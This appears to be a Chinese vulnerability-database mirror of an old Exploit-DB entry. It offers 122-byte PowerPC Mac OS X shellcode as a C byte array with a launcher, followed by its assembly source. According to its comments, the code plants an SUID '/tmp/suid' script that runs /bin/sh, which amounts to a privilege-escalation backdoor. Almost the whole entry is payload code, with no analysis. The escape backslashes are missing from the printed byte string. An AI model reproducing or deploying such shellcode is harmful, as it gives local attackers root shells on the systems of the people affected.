OSX/PPC – Create /tmp/suid Shellcode (122 bytes)

OSX/PPC – Create /tmp/suid Shellcode (122 bytes)

漏洞ID 1054663 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-OSX/PPC – Create /tmp/suid Shellcode (122 bytes)-安全小百科CVE编号 N/A
图片[2]-OSX/PPC – Create /tmp/suid Shellcode (122 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 OSX_PPC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13485
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does open(); write(); close(); exit();
See ASM below.
122 Bytes.
*/

char shellcode[] =
"x7cxa5x2ax79x40x82xffxfd"
"x7fxe8x02xa6x39x1fx01x71"
"x39x08xfexf4x7cxa8x29xae"
"x38x7fx01x68x38x63xfexf4"
"x38x80x02x01x38xa0xffxff"
"x39x40x01x70x38x0axfex95"
"x44xffxffx02x60x60x60x60"
"x38x9fx01x72x38x84xfexf4"
"x38xaaxfex9cx38x0axfex94"
"x44xffxffx02x60x60x60x60"
"x38x0axfex96x44xffxffx02"
"x60x60x60x60x38x0axfex91"
"x44xffxffx02x2fx74x6dx70"
"x2fx73x75x69x64x58x23x21"
"x2fx62x69x6ex2fx73x68x0a"
"x73x68";

int main (void) 
{
        __asm__("b _shellcode");
}

/*
; PPC OS X / Darwin Shellcode by B-r00t. 
; open(); write(); close(); exit()
; Creates an SUID '/tmp/suid' to execute '/bin/sh'.
;
.globl _main
.text
_main:
        xor.    r5, r5, r5
        bnel    _main                    
        mflr    r31
        addi    r8, r31, 268+92+9
        addi    r8, r8, -268    
        stbx    r5, r8, r5
        addi    r3, r31, 268+92
        addi    r3, r3, -268
        li      r4, 513
        li      r5, -1  
        li      r10, 368
        addi    r0, r10, -363
        .long   0x44ffff02
        .long   0x60606060
        addi    r4, r31, 268+92+10
        addi    r4, r4, -268
        addi    r5, r10, -356
        addi    r0, r10, -364
        .long   0x44ffff02
        .long   0x60606060
        addi    r0, r10, -362
        .long   0x44ffff02      
        .long   0x60606060
        addi    r0, r10, -367
        .long   0x44ffff02
path:   .asciz  "/tmp/suidX#!/bin/shnsh"

*/

// milw0rm.com [2004-09-26]

相关推荐: FSF GNU glibc unsetenv Vulnerability

FSF GNU glibc unsetenv Vulnerability 漏洞ID 1104562 漏洞类型 Unknown 发布时间 1999-09-17 更新时间 1999-09-17 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享